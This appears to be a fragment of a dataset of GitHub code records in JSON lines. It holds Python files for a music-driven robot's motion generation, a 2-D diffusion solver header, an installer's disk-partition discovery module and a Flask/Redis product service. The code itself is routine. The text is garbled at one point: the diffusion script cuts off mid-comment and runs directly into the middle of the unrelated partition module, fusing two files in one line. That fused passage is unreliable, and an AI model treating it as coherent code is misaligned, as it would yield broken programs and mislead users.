0.5, tor 0.9, neck 0.3\n\n # Higher valence --> more tendency to look up (correct for leaning forward)\n adjusted_valence = (valence + 1) / 2\n torso_offset = 0.2 * adjusted_valence\n\n # Higher arousal --> more frequent nodding, more movement\n adjusted_arousal = (arousal + 1) / 2\n\n # Wait between half a beat and 2 beats to nod\n half_beat = (self.midi_analysis.get_tempo() / 2)\n nod_wait = half_beat * denormalize_to_range(adjusted_arousal, 4, 1)\n\n # Start direction\n # direction = random.choice([-1, 1])\n direction = 1 # To keep deterministic for experiments\n\n # Proportion of available range (limited by torso) that can be used\n pos_range = 0\n if arousal >= 0:\n # Shorter movements for lower positive arousal\n pos_range = denormalize_to_range(arousal, 0.4, 1.0)\n\n # Burger (High valence -> high acceleration)\n vel_algo = 'linear_ad'\n else:\n # Short movements for less negative arousal\n pos_range = denormalize_to_range(abs(arousal), 0.4, 1.0)\n vel_algo = 'constant'\n\n # Keep track of timeline\n t = 0\n\n # Quantize nods to half beats\n while t < nod_wait:\n t += half_beat\n\n pos = self.calculate_neck_ud_position(\n t, torso, torso_offset, pos_range, direction)\n neck_ud_move = Move(self.shimi, self.shimi.neck_ud,\n pos, t, vel_algo=vel_algo)\n last_move = t\n direction = not direction\n\n while t < length:\n if t < last_move + nod_wait:\n t += half_beat\n else:\n pos = self.calculate_neck_ud_position(\n t, torso, torso_offset, pos_range, direction)\n neck_ud_move.add_move(pos, t - last_move)\n last_move = t\n direction = not direction\n\n return neck_ud_move\n\n def calculate_neck_ud_position(self, t, torso, torso_offset, pos_range, direction):\n \"\"\"Helper to calculate neck position based on offset from torso position.\n\n Args:\n t (float): Time in seconds at which to calculate neck position.\n torso (Move): Sequenced movements of the torso.\n torso_offset (float): Amount neck position should be offset due to the torso.\n pos_range (float): Normalized absolute value of the range of motion for the neck.\n direction (bool): Determines the direction of movement.\n\n Returns:\n float: The position at which to set the neck.\n \"\"\"\n # Torso offset to make it look up when bending forward\n torso_timestamps = torso.get_timestamps()\n torso_position = np.interp(t, torso_timestamps, torso.positions)\n offset = (1 - torso_position) * 10 * torso_offset\n\n half_range = pos_range / 2\n\n # Vary the distance by 20% of possible moving distance\n pos_in_range = half_range + \\\n (direction * (half_range - (0.2 * random.random() * half_range)))\n\n return 1 - (offset + pos_in_range)\n\n def torso_movement(self, valence, arousal):\n \"\"\"Moves torso forward and back according to music and movement research.\n\n Args:\n valence (float): Valence value in range [-1.0, 1.0].\n arousal (float): Arouse value in range [-1.0, 1.0].\n\n Returns:\n Move: A Thread of properly sequenced movements.\n \"\"\"\n # Sievers (Valence --> leaning, derived from generated music contour, which inherently features this)\n contour_notes = self.midi_analysis.get_normalized_pitch_contour()\n\n # Higher valence --> more rapid matching to pitch contour\n smoothing_time = 0\n if valence < 0:\n valence = 0\n\n if valence >= 0:\n shortest_note_length = self.midi_analysis.get_shortest_note_length()\n longest_note_length = self.midi_analysis.get_longest_note_length()\n difference = longest_note_length - shortest_note_length\n smoothing_time = shortest_note_length + \\\n ((1 - valence) * difference)\n\n # Higher arousal --> larger range of motion\n adjusted_arousal = (arousal + 1) / 2\n # Caps torso between 0.3-1.0\n torso_min = 0.7 + (0.10 * (1.0 - adjusted_arousal))\n torso_max = 0.95 + (0.05 * adjusted_arousal)\n\n # Keep track of timeline\n t = 0\n\n # Handle first note\n first_note = contour_notes.pop(0)\n initial_delay = 0\n\n # Find the first note to move to, per smoothing\n while first_note[\"start\"] < smoothing_time:\n initial_delay += (first_note[\"end\"] - t)\n t = first_note[\"end\"]\n first_note = contour_notes.pop(0)\n\n torso_move = Move(self.shimi, self.shimi.torso,\n denormalize_to_range(\n first_note[\"norm_pitch\"], torso_min, torso_max),\n smoothing_time,\n initial_delay=first_note[\"start\"] - smoothing_time,\n vel_algo='constant')\n\n t = first_note[\"start\"]\n last_move = t\n\n delay = 0\n while len(contour_notes) > 0:\n note = contour_notes.pop(0)\n\n if note[\"start\"] > last_move + smoothing_time:\n # Do move\n torso_move.add_move(denormalize_to_range(note[\"norm_pitch\"], torso_min, torso_max),\n note[\"start\"] - last_move,\n vel_algo='constant',\n delay=0)\n\n t = note[\"start\"]\n last_move = t\n delay = 0\n else:\n delay += (note[\"start\"] - t)\n t = note[\"start\"]\n\n if len(torso_move.vel_algos) > 1:\n torso_move.vel_algos[0] = 'linear_a'\n torso_move.vel_algos[-1] = 'linear_d'\n\n return torso_move\n\n def foot_movement(self, tempo, length, valence, arousal):\n \"\"\"Moves foot up and down according to music and movement research.\n\n Args:\n tempo (float): Tempo of the MIDI file in seconds per beat.\n length (float): Length of the MIDI file in seconds.\n valence (float): Valence value in range [-1.0, 1.0].\n arousal (float): Arouse value in range [-1.0, 1.0].\n\n Returns:\n Move: A Thread of properly sequenced movements.\n \"\"\"\n\n # Calculate how often it taps its foot based on arousal\n quantized_arousals = [-1, -0.2, 0, 1]\n quantized_arousal = quantize(arousal, quantized_arousals)\n\n # Higher arousal --> smaller subdivision of tapping\n # Toiviainen (1-beat, 2-beat mediolateral arm movements)\n beat_periods = [4 * tempo, 2 * tempo, tempo, 0.5 * tempo]\n beat_period = beat_periods[quantized_arousals.index(quantized_arousal)]\n\n move_dist = 1.0\n move_dur = beat_period / 2\n move_wait = 0.0\n\n if valence < 0:\n # Lower valence --> shorter movement, faster\n neg_norm = 1 + valence\n # Make sure it moves at least 0.2\n move_dist = denormalize_to_range(neg_norm, 0.2, 1.0)\n # Make sure it's moving for at least 0.1s\n move_dur = denormalize_to_range(neg_norm, 0.1, 1.0) * move_dur\n move_wait = (beat_period / 2) - move_dur\n\n # Params for the linear accel/decel moves\n up_change_time = 0.7\n down_change_time = 0.4\n\n # Wait half of a beat to start, so the ictus is on foot down\n move = Move(self.shimi, self.shimi.foot, move_dist, move_dur,\n vel_algo='linear_a',\n vel_algo_kwarg={'change_time': up_change_time},\n freq=0.04, initial_delay=(beat_period / 2))\n move.add_move(0.0, move_dur,\n vel_algo='linear_d',\n vel_algo_kwarg={'change_time': down_change_time},\n delay=move_wait)\n t = 2 * (move_dur + move_wait)\n\n while t < length:\n move.add_move(move_dist, move_dur,\n vel_algo='linear_a',\n vel_algo_kwarg={'change_time': up_change_time},\n delay=move_wait)\n move.add_move(0.0, move_dur,\n vel_algo='linear_d',\n vel_algo_kwarg={'change_time': down_change_time},\n delay=move_wait)\n t += 2 * (move_dur + move_wait)\n\n return move\n\n def phone_movement(self, tempo, length, valence, arousal):\n \"\"\"Twists the phone cradle DoF in a swaying motion according to music and movement research.\n\n Args:\n tempo (float): Tempo of the MIDI file in seconds per beat.\n length (float): Length of the MIDI file in seconds.\n valence (float): Valence value in range [-1.0, 1.0].\n arousal (float): Arouse value in range [-1.0, 1.0].\n\n Returns:\n Move: A Thread of properly sequenced movements.\n \"\"\"\n # Calculate tempo of \"sway\" based on arousal\n quantized_arousals = [-1, -0.5, 0, 1]\n quantized_arousal = quantize(arousal, quantized_arousals)\n\n # Higher arousal --> faster \"swaying\"\n sway_periods = [4 * tempo, 2 * tempo, 2 * tempo, tempo]\n sway_period = sway_periods[quantized_arousals.index(quantized_arousal)]\n\n # Abs of arousal determines speed\n abs_arousal = abs(arousal)\n # Limit max speed to 50% of time\n move_dur = denormalize_to_range(\n 1.0 - abs_arousal, 0.5, 1.0) * sway_period\n\n # If valence > 0 smooth movements with vel_algo\n if valence > 0:\n vel_algo = 'linear_ad'\n else:\n vel_algo = 'constant'\n\n # Distance is controlled by quadrant\n if valence >= 0 and arousal >= 0:\n sway_width = denormalize_to_range(valence + arousal, 0.1, 0.5)\n elif valence >= 0 and arousal < 0:\n sway_width = denormalize_to_range(valence + abs(arousal), 0.5, 0.1)\n elif valence < 0 and arousal >= 0:\n sway_width = denormalize_to_range(abs(valence) + arousal, 0.5, 0.1)\n else:\n sway_width = denormalize_to_range(\n abs(valence) + abs(arousal), 0.1, 0.5)\n\n # Direction to start is random\n # dir = random.choice([True, False])\n dir = True # To keep deterministic for experiments\n\n move = Move(self.shimi, self.shimi.phone, 0.5 + (sway_width * [1, -1][int(dir)]), move_dur, vel_algo=vel_algo,\n initial_delay=sway_period - move_dur)\n\n t = move_dur\n while t < (length - sway_period):\n dir = not dir\n move.add_move(0.5 + (sway_width * [1, -1][int(dir)]), move_dur, delay=sway_period - move_dur,\n vel_algo=vel_algo)\n t += sway_period\n\n return move\n\n def phone_movement_onsets(self, tempo, length, valence, arousal):\n \"\"\"Twists the phone cradle DoF based on musical onsets and according to music and movement research.\n\n Args:\n tempo (float): Tempo of the MIDI file in seconds per beat.\n length (float): Length of the MIDI file in seconds.\n valence (float): Valence value in range [-1.0, 1.0].\n arousal (float): Arouse value in range [-1.0, 1.0].\n\n Returns:\n Move: A Thread of properly sequenced movements.\n \"\"\"\n contour_notes = self.midi_analysis.get_normalized_pitch_contour()\n onsets = [n[\"start\"] for n in contour_notes]\n\n # first component of speed\n move_dist = denormalize_to_range((1 - abs(valence)), 0.2, 0.8)\n\n quantized_arousals = [-1, -0.6, 0.6, 1]\n quantized_arousal = quantize(arousal, quantized_arousals)\n dur_lengths = [2 * tempo, 1 * tempo, 0.5 * tempo, 0.25 * tempo]\n\n # second component of speed\n move_dur = dur_lengths[quantized_arousals.index(quantized_arousal)]\n\n # center the move, side_dist is the unused space on either side\n side_dist = (1 - move_dist) / 2\n\n # direction of movement is random, but consistent throughout the gesture\n # if random.choice([True, False]):\n if True: # To keep deterministic for experiments\n start_pos = side_dist\n end_pos = 1 - side_dist\n else:\n start_pos = 1 - side_dist\n end_pos = side_dist\n\n # If valence > 0 smooth movements with vel_algo\n if valence > 0:\n vel_algo = 'linear_ad'\n else:\n vel_algo = 'constant'\n\n move = Move(self.shimi, self.shimi.phone,\n start_pos, move_dur, vel_algo=vel_algo)\n t = move_dur\n while t < length:\n while onsets and onsets[0] < t:\n onsets.pop(0)\n if onsets:\n delay = onsets[0] - t\n move.add_move(end_pos, move_dur, delay=delay)\n move.add_move(start_pos, move_dur * 2)\n t += delay + (3 * move_dur)\n onsets.pop(0)\n else:\n t = length\n\n return move\n\n def random_movement(self, motor, length, seed):\n \"\"\"Generates a sequence of random movements for the length of the MIDI file for one motor.\n\n Args:\n motor (int): The motor ID to generate random movements for.\n length (float): Length of the MIDI file in seconds.\n seed (str): A seed for the RNG to make randomness deterministic.\n\n Returns:\n Move: A Thread of properly sequenced movements.\n \"\"\"\n\n random.seed(seed)\n\n if motor == self.shimi.torso:\n move_pos = 0.3 + (random.random() * 0.7)\n else:\n move_pos = random.random()\n move_dur = random.random() * (length / 2)\n\n t = move_dur\n\n rand_move = Move(self.shimi, motor, move_pos, move_dur)\n\n while t < length:\n if motor == self.shimi.torso:\n move_pos = 0.5 + (random.random() * 0.5)\n else:\n move_pos = random.random()\n move_dur = random.random() * (length / 2)\n rand_move.add_move(move_pos, move_dur)\n t += move_dur\n\n return rand_move\n","repo_name":"rytrose/shimi","sub_path":"motion/generative_phrase.py","file_name":"generative_phrase.py","file_ext":"py","file_size_in_byte":26026,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"70525348247","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Nov 22 11:01:42 2020\r\n@author: johna\r\n\"\"\"\r\n\r\n\r\n# MECE 6397, SciComp, Grad Student Project\r\n\r\n# 2-D Diffusion Problem \r\n#Carryout integration intill steady state solution is reached\r\n#used ghost node method for nuemann boundary conditions\r\n#https://github.com/jeander5/MECE_6397_Project\r\n\r\n#imports\r\nimport math\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom math import sin as sin\r\nfrom math import cos as cos\r\n#from mpl_toolkits import mplot3d\r\n\r\n#Domain of interest\r\n#a_x/dev/null' % disk)\n data = stream.read().strip()\n stream.close()\n\n # convert it to int and return\n try:\n return int(data) * BLOCK_SIZE\n\n # not a number: return the default value\n except:\n return default\n# get_disk_size()\n\ndef get_multipath_info(name, multipaths):\n \"\"\"\n Given the passed multipath topology, returns the multipath master and\n sibling slaves for the device with the passed name. If they do not exist,\n returns None for the multipath master and an empty list of the slaves.\n\n @type name: basestring\n @param name: name of the device\n\n @type multipaths: dict\n @param multipaths: multipath topology to be used\n\n @rtype: tuple\n @returns: multipath master and slaves\n \"\"\"\n # master and slaves found: return them\n for master in multipaths:\n if name in multipaths[master]:\n return master, multipaths[master]\n\n # return fallback values\n return None, []\n# get_multipath_info()\n\ndef new_disk(disks, name, size, type, sectorSize, master, slaves, id):\n # invalid list of disks: fail\n if disks is None:\n return False\n\n # create the dictionary with info about the disk\n disk = {}\n disk['name'] = name\n disk['size'] = size\n disk['parts'] = []\n disk['non_part_space'] = size\n disk['touched'] = False\n disk['reuse'] = False\n disk['avail_space'] = 0\n disk['type'] = type\n disk['sectorSize'] = sectorSize\n disk['mpath_master'] = master\n disk['mpath_slaves'] = slaves\n disk['id'] = id\n disk['accessible'] = check_device(name)\n\n # append it to the list of disks\n disks.append(disk)\n# new_disk()\n\ndef new_part(disk, instance, free, fstype, ptype):\n if disk is None:\n return False\n\n part = deepcopy(instance)\n if part.has_key('name'):\n if ptype == 'E':\n part['size'] = 1\n disk['non_part_space'] -= part['size']\n part['nr'] = int(re.search('(\\d+)$', part['name']).group(1))\n else:\n part['end'] = part['start'] + part['size'] - 1\n part['id'] = '0'\n part['name'] = 'empty'\n disk['avail_space'] += part['size']\n part['nr'] = 0\n part['format'] = 'no'\n part['mount_point'] = ''\n part['type'] = ptype\n part['free'] = free\n part['fs'] = fstype\n disk['parts'].append(part)\n\n return True\n# new_part()\n\ndef add_parts(disk, partConf):\n parts = partConf['primaryParts']\n spaces = partConf['emptySpaces']\n for part in partConf['extendedParts']:\n parts.extend(part['childParts'])\n spaces.extend(part['emptySpaces'])\n\n for part in parts:\n if 'mpath' in part['name']:\n # The device-mapper names on MCP6.1 prefix the partition number\n # with \"_part\". Not adding it caused get_part_free_space to fail\n # since the device /dev/mapper/mpath never exists.\n new_name = re.sub(r\"(mpath.)(\\d)\", r\"\\1_part\\2\", part['name'])\n part['name'] = new_name\n try:\n # get filesystem type\n fstype = get_fstype(part)\n\n # get partition type\n ptype = get_ptype(part['name'], fstype)\n\n # get free space in partition\n free = get_part_free_space(part['name'], fstype, partConf['sectorSize'])\n except:\n # we are here possibly because of an usb floppy from hell. Just ignore it\n continue\n\n if ptype == 'E':\n size = 1\n else:\n size = part['size']\n new_part(disk, part, free, fstype, ptype)\n\n for space in spaces:\n if space['size'] / 2 > 1024:\n new_part(disk, space, space['size'], '', '')\n# add_parts()\n\ndef get_partition_lines():\n entries = []\n\n # read partitions file and get its lines\n fin = open('/proc/partitions')\n lines = fin.readlines()\n fin.close()\n\n for l in lines:\n # split line into its four fields\n e = l.strip().split()\n\n # store only adequate entries (with hd* and sd*)\n if len(e) >= 4:\n if 'hd' in e[3] or 'sd' in e[3]:\n entries.append(e)\n return entries\n# get_partition_lines()\n\ndef is_removable(name):\n # Verify whether our disk is removable\n # If it is, skip it\n path = os.path.join('/sys/block', name)\n try:\n f = open(os.path.join(path, 'removable'))\n line = f.readline()\n f.close()\n except:\n return False\n\n if int(line.strip()):\n return True\n\n return False\n# is_removable()\n\ndef get_ptype(name, fstype):\n # get partition type\n # Warning: throws IndexError if the input is invalid\n partno = int(re.search(r'(\\d+)$', name).group(1))\n if partno > 4:\n ptype = 'L'\n elif fstype == 'extended':\n ptype = 'E'\n else:\n ptype = 'P'\n return ptype\n# get_ptype()\n\ndef get_part_free_space(name, fstype, sectorSize):\n if fstype not in NOTMOUNT:\n # mount the partition at /tmp/mnt\n cmdLine = \"mount -t %s /dev/%s /tmp/mnt 2>/dev/null\" % (fstype, name)\n os.system(cmdLine)\n\n # Use 'df' to retrieve the used space\n cmdLine = \"df --block-size %d /tmp/mnt\" % sectorSize\n pipe = os.popen(cmdLine)\n partData = pipe.read()\n free = int(partData.strip().split()[-3])\n pipe.close()\n os.system(\"umount /tmp/mnt 2>/dev/null\")\n else:\n free = -1\n\n return free\n# get_part_free_space()\n\ndef get_fstype(part):\n # first let's see if this is either a PReP or a LVM\n if part['id'].lower() == '8e':\n fstype = 'lvm'\n elif part['id'].lower() == 'fd':\n fstype = 'raid'\n elif part['id'] in ('41', '6') and part['size'] < (2 * 32 * 1024):\n fstype = 'prep'\n elif part['id'] in ('5', 'f', '85'):\n fstype = 'extended'\n # no, so we need to find out using blikid\n else:\n cmdLine = \"blkid /dev/%s\" % (part['name'])\n pipe = os.popen(cmdLine)\n blkidOut = pipe.read().strip()\n pipe.close()\n\n if blkidOut != '':\n fstype = blkidOut.split(' TYPE=')[1].split()[0].strip('\"')\n else:\n fstype = \"unknown\"\n # workaround to fix swap detection in some systems\n if 'swap' in fstype:\n fstype = 'swap'\n\n return fstype\n# get_fstype()\n\ndef isSAN(disk):\n \"\"\"\n Checks if the disk is a fibre-channel.\n\n @type disk: str\n @param disk: disk name\n\n @rtype: bool\n @returns: True if is fibre-channel\n \"\"\"\n if not disk:\n return None\n\n # remove the path and get only the disk name\n diskname = disk.split('/')[-1]\n \n # doesnt handle mpath, the caller must pass any of\n # its slave if want verify mpath\n if 'mpath' in diskname:\n return None\n\n # remove any partition numbers from the diskpath\n diskname = diskname.translate(None, '0123456789')\n\n # get the full device path\n linkpath = '/sys/block/%s' % diskname\n realpath = os.path.realpath(linkpath)\n\n # realpath should not be the same because we\n # need the san disk path in order to verify if\n # it's fibre-channel\n if realpath == linkpath:\n return None\n\n # as per udev (udev-builtin-path_id.c), rport means the disk\n # is a fibre-channel\n if '/rport-' in realpath:\n return True\n\n return False\n# isSAN()\n\ndef isNumber(c):\n \"\"\"\n Checks if a given character is an int\n\n @rtype: bool\n @returns: True is c is a number, False otherwise\n \"\"\"\n try:\n int(c)\n return True\n except ValueError:\n return False\n# isNumber()\n\ndef get_hierarchy_physical(use_multipath=False):\n # create a temp dir to mount the partitions in order to determine their free space\n try:\n os.mkdir(\"/tmp/mnt\")\n except OSError:\n os.system(\"umount /tmp/mnt 2>/dev/null\")\n\n # parse lines\n entries = get_partition_lines()\n\n # detect the multipath topology for this machine\n multipaths = detect_multipath_scheme()\n\n # build disk hierarchy from the entries\n disks = []\n\n for e in entries:\n name = e[3]\n\n # check if is a valid disk (not a partition)\n if len(name) > 2 and (name[:2] == 'sd' or name[:4] == 'dasd') and not isNumber(name[-1:]):\n\n # if this disk is removable, skip it\n if is_removable(name):\n continue\n\n # detect the partition table type of this disk\n type = detect_partition_table_type(name)\n\n # get multipath info for the device\n master, slaves = get_multipath_info(name, multipaths)\n\n # get disk id\n id = get_disk_id(name)\n\n # FIXME: sfdisk is always returning 512 bytes as the\n # sector size for a disk. Even on 4k disks, it's\n # returning 512 bytes. It's a bug! To workaround that,\n # we always use sector size from get_sector_size() which\n # reads value from /sys/block//queue/physical_block_size.\n sector_size = get_sector_size(name)\n\n # non-msdos partition table: cannot read partitions, add empty disk\n if type != 'msdos':\n size = get_disk_size(name) / sector_size\n new_disk(disks, name, size, type, sector_size, master, slaves, id)\n empty = {'start': 1, 'size': size - 1}\n new_part(disks[-1], empty, size, '', '')\n continue\n\n # msdos but could not read partitions: ignore disk\n partConf = parseParts(name)\n\n if not isinstance(partConf, dict):\n continue\n\n # append new disk\n new_disk(disks, name, partConf['diskSize'], type, sector_size,\n master, slaves, id)\n disk = disks[-1]\n\n # append disk partitions\n add_parts(disk, partConf)\n\n # now let's sort the partitions in our list based upon their actual position on the disks\n for d in disks:\n if len(d['parts']) > 0:\n d['parts'].sort(lambda x, y: x['start'] - y['start'])\n\n return disks\n# get_hierarchy_physical()\n\ndef get_hierarchy_lvm(physical):\n \"\"\"\n Updates the disks hierarchy with info about LVM entities present in it\n\n @type physical: dict\n @param physical: disks hierarchy\n\n @rtype: dict\n @returns: lvm hierarchy\n \"\"\"\n # get LVM hierarchy\n lvm = lvminfo.getHierarchy()\n\n # set the physical disks and partitions\n get_lvm_entities(physical, lvm)\n\n return lvm\n# get_hierarchy_lvm()\n\ndef get_hierarchy_raid(physical):\n \"\"\"\n Updates the disks hierarchy with info about RAID entities present in it\n\n @type physical: list\n @param physical: disks hierarchy as returned by L{get_hierarchy}\n\n @rtype: dict\n @returns: raid hierarchy\n \"\"\"\n # get RAID hierarchy\n raid = raidinfo.getHierarchy()\n\n # set the physical disks and partitions\n get_raid_entities(physical, raid)\n\n return raid\n# get_hierarchy_raid()\n\ndef get_lvm_entities(hierarchy, lvm_info):\n \"\"\"\n Updates the disks hierarchy with info about LVM entities present in it\n\n @type hierarchy: dict\n @param hierarchy: disks hierarchy\n\n @rtype: None\n @returns: nothing\n \"\"\"\n # flag LVM disks and partitions\n pvs = lvm_info['pvs']\n\n for disk in hierarchy:\n # whole disk is a LVM physical volume: flag it so and move on\n if disk['name'] in pvs:\n disk['type'] = 'lvm'\n continue\n\n for part in disk['parts']:\n # partition is a LVM physical volume: flag it so\n if part['name'] in pvs:\n part['fs'] = 'lvm'\n part['free'] = -1\n# get_lvm_entities()\n\ndef get_raid_entities(hierarchy, raidInfo):\n \"\"\"\n Updates the disks hierarchy with info about raid entities present in it\n\n @type hierarchy: list\n @param hierarchy: disks hierarchy as returned by L{get_hierarchy}\n\n @type raidInfo: dict\n @param raidInfo: raid hierarchy\n\n @rtype: None\n @returns: nothing\n \"\"\"\n # flatten all the physical disks used by raid\n allRaidPartsUsed = set([part\n for md in raidInfo.itervalues()\n for part in md['devices']])\n\n # flag all partitions used in RAID\n for disk in hierarchy:\n for part in disk['parts']:\n\n # partition is a raid physical volume: flag it so\n if part['name'] in allRaidPartsUsed:\n part['fs'] = 'raid'\n part['free'] = -1\n# get_raid_entities()\n\ndef get_sector_size(disk, default = 512):\n \"\"\"\n Returns the sector size of the passed disk. If it cannot be determined,\n returns the passed default value.\n\n @type disk: basestring\n @param disk: disk name ('sda', 'sdb', ...)\n\n @type default: arbitrary\n @param default: default value to be returned\n\n @rtype: int\n @returns: sector size in bytes\n \"\"\"\n # read the sector size from sysfs\n stream = open('/sys/block/%s/queue/logical_block_size' % disk, 'r')\n data = stream.read().strip()\n stream.close()\n\n # convert it to int and return\n try:\n return int(data)\n\n # not a number: return the default value\n except:\n return default\n# get_sector_size()\n\ndef parseParts(disk_name):\n\n disk = '/dev/%s' % disk_name\n\n partConf = {}\n partConf['headers'] = []\n partConf['primaryParts'] = []\n partConf['emptyParts'] = []\n partConf['extendedParts'] = []\n partConf['allParts'] = []\n\n # Dump partitions\n pipe = os.popen('sfdisk -dx %s 2>/dev/null' % disk)\n dump = pipe.read().strip()\n if pipe.close() != None:\n return 'Error running sfdisk command'\n\n # Determine disk size in sectors\n # First, determine block size\n pipe = os.popen('sfdisk -l -uB %s 2>/dev/null' % disk)\n output = pipe.readlines()\n pipe.close()\n blockSize = 0\n for line in output:\n if line.startswith('Units') and line.find('blocks of ') > -1:\n try:\n blockSize = int(line.split('blocks of ')[1].split()[0])\n except:\n return 'Error determining disk block size'\n break\n if blockSize == 0:\n return 'Could not determine disk block size'\n # Determine sector size\n sectorSize = get_sector_size(disk_name)\n if sectorSize == 0:\n return 'Could not determine disk sector size'\n partConf['sectorSize'] = sectorSize\n # Now, do the math\n pipe = os.popen('sfdisk -s %s' % disk)\n output = pipe.read().strip()\n pipe.close()\n try:\n diskBlocks = int(output)\n partConf['diskSize'] = int((diskBlocks * blockSize) / sectorSize)\n except:\n return 'Error determining disk size'\n\n # Add each partition to the list\n dump = dump.split('\\n')\n saveHeader = True\n i = 0\n while i < len(dump):\n line = dump[i]\n i = i + 1\n # not a partition line: save as header or discard\n if not line.startswith('/dev/'):\n if saveHeader:\n partConf['headers'].append(line)\n continue\n saveHeader = False\n\n try:\n fields = line.split()\n name = line.split()[0].strip('/dev/').strip(':')\n start = int(line.split('start=')[1].split(',')[0].strip())\n size = int(line.split('size=')[1].split(',')[0].strip())\n id = line.split('Id=')[1].split(',')[0].strip()\n number = int(re.search('(\\d+)$', name).group(1))\n except:\n return 'Error retrieving values from sfdisk dump'\n\n end = start + size - 1\n part = { 'name': name, 'start': start, 'end': end, 'size': size,\n 'id': id, 'nr': number}\n\n # partition is logical\n if part['nr'] > 4:\n # we need to store the next logical partition info\n nextLine = dump[i]\n i = i + 3\n try:\n part['nextStart'] = int(nextLine.split('start=')[1].split(',')[0].strip())\n part['nextSize'] = int(nextLine.split('size=')[1].split(',')[0].strip())\n part['nextId'] = nextLine.split('Id=')[1].split(',')[0].strip()\n except:\n return 'Error retrieving values from sfdisk dump'\n\n # Add to appropriate list. At this moment we are possibly\n # adding to the primary list a partition that is inside an extended\n # one, but it will be removed at the second step when the extended\n # list is complete.\n if id == '0':\n partConf['emptyParts'].append(part)\n else:\n partConf['primaryParts'].append(part)\n # partition is extended; also save in appropriate list\n if id in EXTENDED_PARTS:\n extPart = part.copy()\n extPart['childParts'] = []\n partConf['extendedParts'].append(extPart)\n\n partConf['allParts'].append(part)\n\n # Now move all partitions inside an extended partition to the extended list\n for part in partConf['primaryParts'][:]:\n for i in range (0, len(partConf['extendedParts'])):\n # partition is inside extended: move to list\n if part['start'] > partConf['extendedParts'][i]['start'] \\\n and part['end'] <= partConf['extendedParts'][i]['end']:\n partConf['primaryParts'].remove(part)\n partConf['extendedParts'][i]['childParts'].append(part)\n\n # Order partitions by position on disk\n partConf['primaryParts'].sort(lambda x, y: cmp(x['start'], y['start']))\n partConf['extendedParts'].sort(lambda x, y: cmp(x['start'], y['start']))\n for i in range (0, len(partConf['extendedParts'])):\n partConf['extendedParts'][i]['childParts'].sort(lambda x, y: cmp(x['start'], y['start']))\n # Order empty and all partitions by name\n partConf['emptyParts'].sort(lambda x, y: cmp(x['nr'], y['nr']))\n partConf['allParts'].sort(lambda x, y: cmp(x['nr'], y['nr']))\n\n # Find empty spaces between primary partitions\n partConf['emptySpaces'] = []\n\n # No primary parts: add entire space\n if len(partConf['primaryParts']) == 0:\n spaceDict = {\n 'start': 1,\n 'size': partConf['diskSize'] - 1\n }\n partConf['emptySpaces'].append(spaceDict)\n else:\n # check disk beginning\n if partConf['primaryParts'][0]['start'] > 1:\n space = partConf['primaryParts'][0]['start'] - 1\n spaceDict = {\n 'start': 1,\n 'size': space\n }\n partConf['emptySpaces'].append(spaceDict)\n\n # check remaining partitions\n for i in range(0, (len(partConf['primaryParts'])-1) ):\n space = partConf['primaryParts'][i+1]['start'] - partConf['primaryParts'][i]['end'] - 1\n if space > 0:\n spaceDict = {\n 'start': partConf['primaryParts'][i]['end'] + 1,\n 'size': space\n }\n partConf['emptySpaces'].append(spaceDict)\n\n # check disk end\n space = partConf['diskSize'] - partConf['primaryParts'][-1]['end'] - 1\n if space > 0:\n spaceDict = {\n 'start': partConf['primaryParts'][-1]['end'] + 1,\n 'size': space\n }\n partConf['emptySpaces'].append(spaceDict)\n\n\n # Do the same for the extended partitions\n for part in partConf['extendedParts']:\n part['emptySpaces'] = []\n\n # No primary parts: add entire space\n if len(part['childParts']) == 0:\n spaceDict = {\n 'start': part['start'] + 1,\n 'size': part['size'],\n }\n part['emptySpaces'].append(spaceDict)\n else:\n # check extended partition beginning\n if part['childParts'][0]['start'] > 1:\n space = part['childParts'][0]['start'] - part['start'] - 1\n spaceDict = {\n 'start': part['start'] + 1,\n 'size': space\n }\n part['emptySpaces'].append(spaceDict)\n\n # check children partitions\n for i in range(0, (len(part['childParts'])-1) ):\n space = part['childParts'][i+1]['start'] - part['childParts'][i]['end'] - 1\n if space > 0:\n spaceDict = {\n 'start': part['childParts'][i]['end'] + 1,\n 'size': space\n }\n part['emptySpaces'].append(spaceDict)\n\n # check extended partition end\n space = part['end'] - part['childParts'][-1]['end']\n if space > 0:\n spaceDict = {\n 'start': part['childParts'][-1]['end'] + 1,\n 'size': space\n }\n part['emptySpaces'].append(spaceDict)\n\n\n # return dictionary\n return partConf\n# parseParts()\n\ndef run_multipath(command, interval = 0.0, retry = 1.0):\n \"\"\"\n Runs the passed multipath command. If it returns a non-zero exit status,\n waits for the passed time and tries again until it exits with zero. Before\n returning, sleeps for the passed interval. Returns the output of the\n command.\n\n This function was writen because it seems that an invocation of the\n multipath command may sometimes fail when it is done before a previous\n invocation has had time enough to take effect on the system.\n\n @type command: basestring\n @param command: multipath command to be run\n\n @type interval: float\n @param interval: sleep interval in seconds\n\n @type retry: float\n @param retry: time to wait before trying again\n\n @rtype: basestring\n @returns: command output\n \"\"\"\n # try at most 10 times\n retries = 0\n\n while True:\n # run the command\n stream = os.popen(command)\n output = stream.read()\n status = stream.close()\n\n # exit status is zero or last retry: done\n if not status or retries == 10:\n break\n\n # wait before retrying\n time.sleep(retry)\n retries += 1\n\n # sleep for the passed interval\n time.sleep(interval)\n\n # return the output\n return output\n# run_multipath()\n","repo_name":"fedosu85nce/work","sub_path":"zfrobisher-installer/src/modules/partitioner/discinfo.py","file_name":"discinfo.py","file_ext":"py","file_size_in_byte":26672,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"22519696217","text":"# Product service\n\nfrom flask import Flask\nfrom flask_restful import Resource, Api\nfrom redis import Redis\n\nimport os\n\napp = Flask(__name__)\napi = Api(app)\nredis = Redis(host=os.environ.get('REDIS_HOST', 'redis'), port=6379)\n\nclass Product(Resource):\n def get(self):\n return {\n 'products':['Ice cream',\n 'Chocolate',\n 'Bread',\n 'Fruit',\n 'Eggs']\n }\n\nclass Hello(Resource):\n def get(self):\n redis.incr('hits')\n return 'This service been hit %s times.\\n' % redis.get('hits').decode('utf-8')\n\napi.add_resource(Product, '/')\napi.add_resource(Hello, '/hello')\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=80, 